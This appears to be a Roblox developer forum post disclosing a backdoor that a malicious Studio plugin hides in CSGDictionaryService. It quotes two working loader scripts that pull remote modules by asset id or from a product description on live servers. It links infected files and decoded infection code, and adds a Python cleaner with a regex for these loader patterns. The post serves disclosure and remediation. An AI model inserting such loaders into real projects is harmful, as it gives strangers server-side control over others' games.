(NEW: Plugin created for automated removal/reparenting of this infection! Hidden/Infection Script Detector - Roblox)
Shoutout to Dekkonot for making me aware of “GetDescendants” which made the creation of this plugin possible!
I recently looked into reports of server-side script injection exploitation at a game I occasionally assist in developing, and it intrigued me as the game is FilteringEnabled and the developers who worked on it were quite thorough on security. After a long time searching and testing I found the culprit was a backdoor installed by an infected plugin (the offending plugin is unknown at this time), and so I began searching for the backdoor script. This was a lengthy search which ultimately resulted in me deleting everything visible in Studio’s explorer, saving the game as a file, and reuploading it to a new place, only to find the infection was still there. This confirmed the infection was in a location non-viewable and inaccessible to both Studio’s explorer and the command bar (as I had made and been running numerous search scripts).

Once I learned this I saved the place to XML, opened it in a text editor, and began reading. Thankfully, before long I came across the culprit and began attempting to build a plugin to remove the infection from any game that has it. I soon found that the area the infection is placed into is level 6 access restricted (and the documentation stating that plugins have level 6 is inaccurate, as plugins only have level 5 access), so the only way to remove this infection is by altering the XML save file in a text editor and reuploading it. This poses a serious issue, as most places don’t know they are infected and have no way to find out other than thorough investigation, only to either never find the source (a bad plugin) or never find the backdoor (inaccessible to everything except the place saved in XML format and opened in a text editor). At the very least I’d like to request that ROBLOX fix the plugin access level to be capable of indexing and reading the children of a level 6 protected asset so an open-source plugin for removing this infection can be distributed. Preferably this service and/or its children also would not publish into the game via Studio.
Below are related links, the backdoor scripts hidden inside “CSGDictionaryService”, an XML excerpt, and a sample infected place save file.
Place Infection XML excerpt “CSGDictionaryService”: InfectedPlaceExcerpt.txt (19.0 KB)
Infected place xml save file: InfectedPlace.rbxlx (36.0 KB)
Backdoor scripts inserted by malicious plugins:
--Script 1
-- Bails out in Studio or if a marker object exists in Terrain, then loads a remote module by asset id on the live server
spawn(function()
	game:WaitForChild("ServerScriptService")
	if game:GetService("Workspace").Terrain:FindFirstChild("CallF") then return end
	if game:GetService("RunService"):IsStudio() then return end
	pcall(function()
		require(2655056793).load(game.PlaceId)
	end)
end)
--Script 2
-- Pulls the module id out of a marketplace product's description, so the loaded module can be swapped without touching the place
marketplaceService = game:GetService("MarketplaceService")
productInfo = marketplaceService:GetProductInfo(2655062037)
modulefunc = productInfo.Description
modulefunc = tonumber(string.match(modulefunc, "%d+"))
require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)
This grants anyone who purchases the exploit the ability to execute server-side code at any infected place. The exploit code also sends an HttpService request to the exploit creator’s webservers, which marks the place as infected and places it in a list for the users of said exploit to pick through and terrorize at will.
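Since the post’s only working remediation is editing the .rbxlx save file outside Studio, here is an added example (not code from the post or from the linked plugin) that does that edit mechanically: it parses the XML, removes every Script/LocalScript/ModuleScript nested under CSGDictionaryService, and reports which of them matched the loader patterns seen in the two scripts above. It assumes the rbxlx layout of nested `<Item class=...>` elements whose `<Properties>` carry a `ProtectedString` named `Source`; the sample file is constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the rbxlx layout (assumed: scripts are <Item> elements whose
# Properties hold a ProtectedString named "Source"). One backdoor-style Script sits
# under CSGDictionaryService, where Studio's explorer cannot show it.
SAMPLE_RBXLX = """<roblox version="4">
  <Item class="Workspace" referent="RBX0">
    <Properties><string name="Name">Workspace</string></Properties>
    <Item class="Script" referent="RBX1"><Properties><string name="Name">Main</string>
      <ProtectedString name="Source">print("hello")</ProtectedString></Properties></Item>
  </Item>
  <Item class="CSGDictionaryService" referent="RBX2">
    <Properties><string name="Name">CSGDictionaryService</string></Properties>
    <Item class="Script" referent="RBX3"><Properties><string name="Name">Loader</string>
      <ProtectedString name="Source">spawn(function() require(1234567).load(game.PlaceId) end)</ProtectedString>
    </Properties></Item>
  </Item>
</roblox>"""

SCRIPT_CLASSES = {"Script", "LocalScript", "ModuleScript"}
# Traits of the two scripts quoted in the post: require() of a bare asset id, and
# GetProductInfo used to pull a module id out of a product description.
SUSPICIOUS = re.compile(r"require\s*\(\s*\d+\s*\)|GetProductInfo\s*\(")

def strip_hidden_scripts(xml_text, hidden_services=("CSGDictionaryService",)):
    """Remove every script under the named services; return (cleaned_xml, report).

    report is a list of (path, referent, looks_like_loader) for each removed script."""
    root = ET.fromstring(xml_text)
    report = []

    def prune(parent, path):
        for child in list(parent.findall("Item")):
            name_el = child.find("./Properties/string[@name='Name']")
            here = path + [name_el.text if name_el is not None else child.get("class")]
            if child.get("class") in SCRIPT_CLASSES:
                src = child.find("./Properties/ProtectedString[@name='Source']")
                code = (src.text or "") if src is not None else ""
                report.append(("/".join(here), child.get("referent"), bool(SUSPICIOUS.search(code))))
                parent.remove(child)  # no legitimate script belongs here, so drop it outright
            else:
                prune(child, here)

    for top in root.findall("Item"):
        if top.get("class") in hidden_services:
            prune(top, [top.get("class")])
    return ET.tostring(root, encoding="unicode"), report
```

For a real save, read the file as bytes (`ET.fromstring(open(path, "rb").read())`), write the cleaned string back out, and review the report before reuploading the place.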
Edit: I have been informed by one of the devs involved that this was the offending plugin: [ Content Deleted ] - Roblox
(and just in case the plugin creator attempts to update it to remove the infection I have a copy saved here: 3bc2897e11825866ad1a687005730a09.rbxm (62.5 KB) )
…or if you just want the code that actually inserts the malicious scripts into the CSGDictionaryService I put it here: SirHurt plugin infection code - Pastebin.com
Edit 2: I went ahead and decoded the actual infection script from the infected plugin. Now I give it to you all for your viewing/reading pleasure: Decrypted Infection Script - Pastebin.com (The data variable in the infection script also included some garbled nonsense that I assume is a function dump, but the actual infection code is what I put into the post.)